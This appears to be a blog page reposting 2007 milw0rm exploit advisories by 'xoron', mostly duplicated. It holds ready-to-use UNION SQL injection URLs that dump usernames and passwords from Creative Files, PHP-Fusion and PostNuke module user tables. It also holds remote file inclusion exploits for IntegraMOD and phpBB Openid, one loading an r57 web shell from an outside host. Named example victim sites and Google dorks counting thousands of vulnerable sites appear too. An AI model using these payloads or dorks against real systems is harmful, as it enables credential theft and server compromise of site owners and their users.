======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================
# milw0rm.com [2007-03-16]
Sabtu, 20 Oktober 2007
PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit
Ringkasan ini tidak tersedia. Harap
klik di sini untuk melihat postingan.
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron
xoron.biz
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron
xoron.biz
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
Bulan: xoron
xoron.biz
+
Love's the funeral of hearts
The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you
:(
============================================================
Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
============================================================
Example: http://andersonvision.com/PostNuke/
============================================================
# milw0rm.com [2007-04-28]
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
Bulan: xoron
xoron.biz
+
Love's the funeral of hearts
The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you
:(
============================================================
Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
============================================================
Example: http://andersonvision.com/PostNuke/
============================================================
# milw0rm.com [2007-04-28]
IntegralMOD
------------------------
Found: xoron
------------------------
Vendor: http://www.integramod.nl/forum/portal.php
Download: http://sourceforge.net/project/showfiles.php?group_id=191355
------------------------
Exploit:
includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
------------------------
Kral kraldır!
------------------------
# milw0rm.com [2007-09-27]
Found: xoron
------------------------
Vendor: http://www.integramod.nl/forum/portal.php
Download: http://sourceforge.net/project/showfiles.php?group_id=191355
------------------------
Exploit:
includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
------------------------
Kral kraldır!
------------------------
# milw0rm.com [2007-09-27]
phpBB Openid 0.2.0 Remote File Include
============================================
= =
= XORON (c) 2007 =
= =
============================================
= =
= phpBB Openid 0.2.0 Remote File Include =
= =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
= =
= Special thanks "k1tkat" :) =
= =
============================================
# milw0rm.com [2007-09-30]
= =
= XORON (c) 2007 =
= =
============================================
= =
= phpBB Openid 0.2.0 Remote File Include =
= =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
= =
= Special thanks "k1tkat" :) =
= =
============================================
# milw0rm.com [2007-09-30]
Langganan:
Postingan (Atom)